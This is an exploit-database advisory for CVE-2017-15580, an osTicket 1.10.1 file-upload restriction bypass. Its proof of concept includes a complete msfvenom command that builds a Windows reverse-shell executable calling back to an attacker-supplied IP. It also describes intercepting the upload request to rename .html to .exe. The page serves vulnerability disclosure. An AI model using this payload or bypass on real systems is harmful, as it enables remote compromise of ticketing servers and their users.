osTicket 1.10.1 Shell Upload Vulnerability

🗓️ 25 Oct 2017 00:00:00Reported by Rajwinder SinghType

zdt🔗 0day.today👁 1584 Views

osTicket 1.10.1 Shell Upload Vulnerability, File Upload Restrictions Bypassed, Remot

Reporter	Title	Published	Views	Family All 10
BDU FSTEC	The vulnerability of the tickets.php script in the osTicket customer support system, which allows a perpetrator to upload malicious files.	2 Feb 201800:00	–	bdu_fstec
CNVD	OsTicket File Upload Vulnerability	26 Oct 201700:00	–	cnvd
CVE	CVE-2017-15580	23 Oct 201708:00	–	cve
Cvelist	CVE-2017-15580	23 Oct 201708:00	–	cvelist
Exploit DB	osTicket 1.10.1 - Arbitrary File Upload	8 Aug 201800:00	–	exploitdb
exploitpack	osTicket 1.10.1 - Arbitrary File Upload	8 Aug 201800:00	–	exploitpack
NVD	CVE-2017-15580	23 Oct 201708:29	–	nvd
OSV	CVE-2017-15580	23 Oct 201708:29	–	osv
Packet Storm	osTicket 1.10.1 Shell Upload	25 Oct 201700:00	–	packetstorm
Prion	Design/Logic Flaw	23 Oct 201708:29	–	prion

Reference: https://becomepentester.blogspot.ae/2017/10/osTicket-File-Upload-
Restrictions-Bypassed-CVE-2017-15580.html

*# Exploit Title: File Upload Restrictions Bypassed*
*# Date: 18 October, 2017*
*# Exploit Author: Rajwinder Singh*
*# Vendor Homepage: http://osticket.com/ <http://osticket.com/>*
*# Software Link: http://osticket.com/download/go?dl=osTicket-v1.10.1.zip
<http://osticket.com/download/go?dl=osTicket-v1.10.1.zip>*
*# Version: v1.10.1*
*# CVE : 2017-15580*

Vulnerability Details:
======================
osTicket application provides a functionality to upload 'html' files with
associated formats. However, application does not properly validate the
uploaded fileas contents and thus accepts any type of files.

*Proof-of-Concept:*
====================
Uploaded shell to get reverse shell of end user for the demo purpose.

1. Created a valid '.html' file to bypass client-side validations.
<html>
<title>test</title>
<body>
<p>test page</p>
</body>

</html>

2. Created a reverse shell with '.exe' file extension using msfvenom.
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=<YOUR
IP> LPORT=4444 -b "\x00" -e <encoder> -f exe -o reverse.exe
https://www.offensive-security.com/metasploit-unleashed/binary-payloads/

3. As shown in the below screenshot, intercepted the request and changed
file extension '.html' to '.exe' and received a valid response from server
along with uploaded malicious file.


<https://3.bp.blogspot.com/-XqKsaTccLvg/WebuXgaRd7I/AAAAAAAANVs/NoWSFi9Mmwol8KxzUJQzyCSonov3yqg6gCLcBGAs/s1600/1.file_upload_extension_bypass.JPG>



*Response:*
<https://4.bp.blogspot.com/-3peKN-VR_os/Webulv3N7aI/AAAAAAAANVw/17FtsSCVNoIxTcEsfUle4VxQKYlQoBAqQCLcBGAs/s1600/2.file_upload_extension_bypass.JPG>

4. As shown in the below screenshot, successfully uploaded malicious file
on the server.
<https://4.bp.blogspot.com/-lH2vbsUDKZQ/Webu0WOio-I/AAAAAAAANV0/Jl8KFD0cHZsinpENfc1hV8OaDtcH1P0YQCLcBGAs/s1600/3.file_upload_extension_bypass.JPG>

Ready to get reverse shell.

*Affected Component:*
====================
*Parameter:* tickets.php?id=<ticket_number>#reply


*Disclosure Timeline:*
=====================
Vendor Confirmation: 11 October, 2017
Mitre Notification: 17 October, 2017
Public Disclosure: 18 October, 2017

*Exploitation Technique:*
=======================
Remote

*Severity Level:*
================
High

*Description:*
=====================================================
Request Method(s): [+] POST
Vulnerable Product: [+] osTicket - v1.10.1
Vulnerable Parameter(s): [+] tickets.php?id=<ticket_number>#reply

#  0day.today [2018-01-08]  #

25 Oct 2017 00:00Current

9.2High risk

Vulners AI Score9.2

EPSS0.3584